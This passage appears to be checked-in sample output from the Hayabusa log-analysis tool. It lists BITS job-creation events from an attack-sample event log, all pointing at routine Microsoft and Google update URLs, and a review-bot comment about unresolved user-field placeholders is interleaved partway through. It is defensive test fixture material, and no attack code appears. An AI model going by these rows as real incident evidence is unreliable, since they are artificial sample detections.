and Control/bits_openvpn.evtx +2020-11-09 08:28:07.533 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 08:28:08.240 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 11:33:58.291 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 
11:33:58.749 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 11:33:59.731 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 13:29:29.376 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 13:29:29.868 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 12:35:58.814 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 12:36:00.732 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 12:51:23.040 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 12:51:33.078 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.703 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.714 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.718 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.722 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.743 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.748 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.752 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.756 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push 
Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.788 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.794 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.798 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.802 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.899 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.906 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.910 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.913 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 10:56:13.148 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: 
C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 12:44:50.465 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 14:12:22.524 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 14:12:25.568 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 10:12:09.946 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 10:31:57.260 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:57:22.022 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 11:47:59.752 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 11:48:00.273 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 12:31:35.114 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
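Review bot: the Process Access rows produced by rules/hayabusa/sysmon/events/10_ProcessAccess.yml (the svchost.exe to Explorer.EXE row, the two Rundll32.exe rows with Src PID 7552 and 9116, and the ProcessHerpaderping.exe row) carry the literal text `Src User: %SourceUser% | Tgt User: %TargetUser%`, which indicates the rule's details template references event fields that these sample Event ID 10 records do not contain and the unresolved placeholders are being committed into the sample timeline. Suggest either removing the two user fields from that template or having the details renderer substitute an empty value when a referenced field is absent (so the row reads `Src User:  | Tgt User: `), then regenerating this sample file so the checked-in output matches what users will actually see.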
+2020-11-16 13:57:53.156 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 13:57:54.168 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-17 17:41:01.832 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-17 17:41:02.662 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-17 21:09:43.966 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 10:01:10.759 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 21:49:45.347 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 21:49:46.212 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 21:49:57.232 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 09:04:09.949 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-11-19 09:33:33.409 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 10:45:57.562 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 17:49:15.102 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 17:49:15.960 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:12:30.660 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:12:31.102 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: 
UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:16:44.077 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:18:47.864 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:01.301 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:08.126 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:17.194 
+00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:21.164 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:25.377 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:19:34.726 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 11:50:16.788 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-11-21 11:50:17.148 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 15:54:58.415 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 15:54:59.449 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 16:00:56.714 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 16:00:57.346 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 10:46:03.984 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification 
